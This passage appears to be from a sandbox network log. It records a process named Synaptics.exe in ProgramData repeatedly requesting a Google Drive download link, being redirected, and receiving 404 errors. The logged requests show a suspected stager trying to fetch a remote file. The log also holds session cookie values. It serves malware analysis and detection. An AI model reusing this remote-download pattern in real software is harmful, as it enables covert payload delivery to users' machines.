                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-X5UhV6BTCZg1LHuqsrqIlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        7 | 192.168.2.9 | 49787 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:20 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Cp9MHh6l2Ck6WQcy0fQqaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        8 | 192.168.2.9 | 49788 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:20 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:21 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC7zIzCrrM_LMVkk8dm062WGmC-SjW9ndIMFOZ5dn7_WUSR_fjO2G4nfX3HtcWPWbmY2
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6wa03LzFRxw5PAugiy2OXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4; expires=Tue, 01-Jul-2025 10:49:21 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:21 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dhqPt5JFQJpuFKdsNOvViA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:21 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        9 | 192.168.2.9 | 49789 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:20 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:21 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC7GKPgiQtq6bl4V02ugncB5OHfiNo_SoIRf2g1LaneoyB9Hyvx6l3DWdM41o1gzivFG
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wH2-ty5DeJGacJp0u2n8HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=N4o1QVHeRgToqi6PnzM7a9AWDqDNpp5iKvqa-6LRvuOdQrVAYMrf5I2OKNUBbU2VitAEs5OSY2ydQ1MUIvKAcrUbZ8lXCV17u352mktvNEWwdZ6EiHvAKFqf0w6u7mIHAssjMaQVw3jVByZXOTLMR-g-8JMbikLyJt-ATRYZLNBSrxRkcLnB7-Dp; expires=Tue, 01-Jul-2025 10:49:21 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:21 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="re15fICcBm83dRt9s731Ug">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:21 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        10 | 192.168.2.9 | 49798 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:21 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8_r6WwwEMqy9CPWwRVDl1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        11 | 192.168.2.9 | 49797 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:21 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5rJZITn6Hf954UZNplBJYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        12 | 192.168.2.9 | 49800 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:21 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
                                                                                                        2024-12-30 10:49:22 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4MSMcMYdrqW-DJWXb7zMENZlOn0XGfN7zsffyzPOay7_4RNBubjtA92erSHGgpLzwk
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:22 GMT
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0JI98NROO5hh--RgVA3zrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:22 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                        2024-12-30 10:49:22 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="1jT1C1KnAy4kKerndQdG8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                        2024-12-30 10:49:22 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
13  192.168.2.9  49801  142.250.185.161  443  1360  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:49:21 UTC  387  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
2024-12-30 10:49:22 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4U_peNXljvIHZoDEZg78g6BskECuHi44MXb7gumbvSGFltC4A8fu0vU9LiRklWxVUf
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:22 GMT
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-y9_sbqWLfDeDEKMTKrCEyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
2024-12-30 10:49:22 UTC  147  IN
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:22 UTC  1390  IN
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="LPNS3z2Nt64SH0KPlHTOpg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:22 UTC  115  IN
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
14  192.168.2.9  49818  142.250.186.78  443  1360  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:49:23 UTC  143  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
2024-12-30 10:49:23 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-a8sHsQAw8hXtgZZT0Bydsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
15  192.168.2.9  49819  142.250.186.78  443  1360  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:49:23 UTC  143  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
2024-12-30 10:49:23 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-drV6XGMV1Jp82X46ZNzVuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
16  192.168.2.9  49829  142.250.185.161  443  1360  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:49:24 UTC  387  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
2024-12-30 10:49:24 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC6PJaqnq5uz0yQXOF-rbw6RTpyfBrVw1q44YYQz_STxntOTfrPihk1ukhov0zQydG03
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1H1iy6TijaKai38xS3og4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
2024-12-30 10:49:24 UTC  147  IN
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:24 UTC  1390  IN
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="rJ79Rbny0hs0Iz0lI7PuLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:24 UTC  115  IN
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
17  192.168.2.9  49828  142.250.186.78  443  1360  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:49:24 UTC  143  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
2024-12-30 10:49:24 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
